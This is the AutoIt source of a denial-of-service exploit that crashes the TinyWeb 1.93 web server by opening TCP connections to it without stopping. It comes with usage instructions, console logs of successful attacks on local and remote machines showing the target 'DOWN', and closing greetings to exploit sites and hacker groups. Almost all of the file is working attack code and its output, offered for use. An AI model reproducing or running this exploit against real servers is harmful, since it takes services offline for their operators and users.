#NoTrayIcon

#cs

TinyWeb/1.93 Denial Of Service (Remote Crash) exploit;
This is simple exploit written in AutoIT that crashes Remote/Local  TinyWeb/1.93 web server.
If you want to use exploit then you've to compile it as CUI application.
Official site of TinyWeb: =>  http://www.ritlabs.com/en/products/tinyweb/

/AkaStep

(Local Testing)
OS on both machines : XP SP2 (ru) 32 bit

D:\programming1\tinyweb>dos.exe --help

##############################################################
##########   TinyWeb/1.93 DENIAL OF SERVICE exploit ##########
##########    Usage: dos.exe REMOTEIP  REMOTEPORT   ##########
\\\\\\\\\\          HACKING IS LIFESTYLE!          //////////
##############################################################

D:\programming1\tinyweb>dos.exe 192.168.0.15 89

##############################################################
##########   TinyWeb/1.93 DENIAL OF SERVICE exploit ##########
##########    Usage: dos.exe REMOTEIP  REMOTEPORT   ##########
\\\\\\\\\\          HACKING IS LIFESTYLE!          //////////
##############################################################

################ WORKING ON IT! PLEASE WAIT...################
--------------------------------------------------------------
~ TRY count: ~ 400
--------------------------------------------------------------
--------------------------------------------------------------
~ TRY count: ~ 800
--------------------------------------------------------------
--------------------------------------------------------------
~ TRY count: ~ 1200
--------------------------------------------------------------
--------------------------------------------------------------
~ TRY count: ~ 1600
--------------------------------------------------------------
--------------------------------------------------------------
~ TRY count: ~ 2000
--------------------------------------------------------------
##############################################################
##########            Mission Complete!             ##########
      TARGET =>http://192.168.0.15:89/ is * DOWN ! *
##############################################################
D:\programming1\tinyweb>telnet 192.168.0.15 89
Подключение к 192.168.0.15...Не удалось открыть подключение к этому узлу, на порт 89: Сбой подключения

D:\programming1\tinyweb>ping 192.168.0.15

Обмен пакетами с 192.168.0.15 по 32 байт:

Ответ от 192.168.0.15: число байт=32 время<1мс TTL=128
Ответ от 192.168.0.15: число байт=32 время<1мс TTL=128

Статистика Ping для 192.168.0.15:
    Пакетов: отправлено = 2, получено = 2, потеряно = 0 (0% потерь),
Приблизительное время приема-передачи в мс:
    Минимальное = 0мсек, Максимальное = 0 мсек, Среднее = 0 мсек
Control-C
^C

REMOTE TESTING:



ATTACKER USES WINDOWS SERVER 2003 machine and launches our exploit against
WIndows XP SP2 machine which hosts TinyWEB 1.93.

$ dos.exe xx.xx.xx.xx 81  (<=Attacker launches following command from remote server via shell.)

##############################################################
##########   TinyWeb/1.93 DENIAL OF SERVICE exploit ##########
##########    Usage: dos.exe REMOTEIP  REMOTEPORT   ##########
\\\\\\\\\\          HACKING IS LIFESTYLE!          //////////
##############################################################

################ WORKING ON IT! PLEASE WAIT...################
--------------------------------------------------------------
~ TRY count: ~ 400
--------------------------------------------------------------
--------------------------------------------------------------
~ TRY count: ~ 800
--------------------------------------------------------------
##############################################################
##########            Mission Complete!             ##########
      TARGET =>http://xx.xx.xx.xx:81/ is * DOWN ! *
##############################################################


Few screenshots:

http://s019.radikal.ru/i615/1303/e3/16829de24bda.png

http://s019.radikal.ru/i623/1303/bc/2ed02aa70ad2.png

http://s017.radikal.ru/i415/1303/15/50c0278d02ed.png




#ce

#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_UseUpx=n
#AutoIt3Wrapper_Change2CUI=y
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#include <String.au3>





$f=_StringRepeat('#',10);
$USE_PROTO='HTTP://';
$INVALIDIP='INVALID IP FORMAT';
$INVALIDPORT='INVALID PORT NUMBER!';
$HTTPUA='Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SV1; .NET CLR 1.1.4325)';
$msg_usage=$f & '   TinyWeb/1.93 DENIAL OF SERVICE exploit ' & $f & @CRLF & _
$f & "    Usage: " & _
@ScriptName &  ' REMOTEIP ' &  ' REMOTEPORT   ' & $f & @CRLF & _
StringReplace($f,'#','\') & _StringRepeat(' ',10)  & _
'HACKING IS LIFESTYLE!' & _StringRepeat(' ',10) &  StringReplace($f,'#','/')

if $CmdLine[0]=0 Then
MsgBox(64,"","This is a console Application!" & @CRLF & 'More Info: '  & @ScriptName & ' --help' & @CRLF & _
'Invoke It from MSDOS!',5)
exit;
EndIf
if  $CmdLine[0] <> 2 Then
  ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF);
  exit;
EndIf

$ip=StringMid($CmdLine[1],1,15);//255.255.255.255
$port=StringMid($CmdLine[2],1,5);//65535

validateall($ip,$port)

func validateall($ip,$port)
if not StringIsDigit($port) Or NOT (Number($port)<=65535) Then
ConsoleWrite($INVALIDPORT);
Exit;
EndIf

TCPStartup();
$ip=TCPNameToIP($ip);
TCPShutdown();

$z=StringSplit($ip,Chr(46));//Asc('.')
if @error then
ConsoleWrite($INVALIDIP);
exit;
EndIf

for $x=0 to $z[0]
if Number($z[0]-1) <>3 Then
ConsoleWrite($INVALIDIP);
Exit
EndIf

if $x>=1 AND Not StringIsDigit($z[$x]) Or StringLen($z[$x])>3 Then
ConsoleWrite($INVALIDIP);
exit;
EndIf
Next

$x=0;

ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF);
ConsoleWrite(@CRLF & $f & _StringRepeat('#',6) & ' WORKING ON IT! PLEASE WAIT...' &  _StringRepeat('#',6) & $f & @CRLF)

downit($ip,$port,$x)

EndFunc; =>validateall($ip,$port)



Func downit($ip,$port,$x)
$x+=1;
TCPStartup()
$socket_con = -1
$socket_con = TCPConnect($ip, $port)
If  not @error Then

if Mod($x,400)=0 Then
ConsoleWrite(_StringRepeat('-',62) & @CRLF & '~ TRY count: ~ ' & $x & @CRLF &  _StringRepeat('-',62) & @CRLF)
Sleep(Random(1000,1800,1));
EndIf

downit($ip,$port,$x)


Else

Beep(1000,1500)
ConsoleWrite(_StringRepeat('#',62) & @CRLF & $f & _StringRepeat(' ',12) & 'Mission Complete! ' & _StringRepeat(' ',12) &   $f & @CRLF & _
_StringRepeat(' ',5)  & ' TARGET =>' & StringLower($USE_PROTO & $ip & ':' & $port) & '/ is * DOWN ! * ' & @CRLF &  _StringRepeat('#',62));


TCPShutdown();
exit;
EndIf
EndFunc; ==>downit($ip,$port,$x)


#cs

================================================
           KUDOSSSSSSS
================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com
itsecuritysolutions.org
waraxe.us

to all Aa Team + to all Azerbaijan Black HatZ
+ *Especially to my bro CAMOUFL4G3 *
To All Turkish Hackers

Also special thanks to: ottoman38 & HERO_AZE
================================================

#ce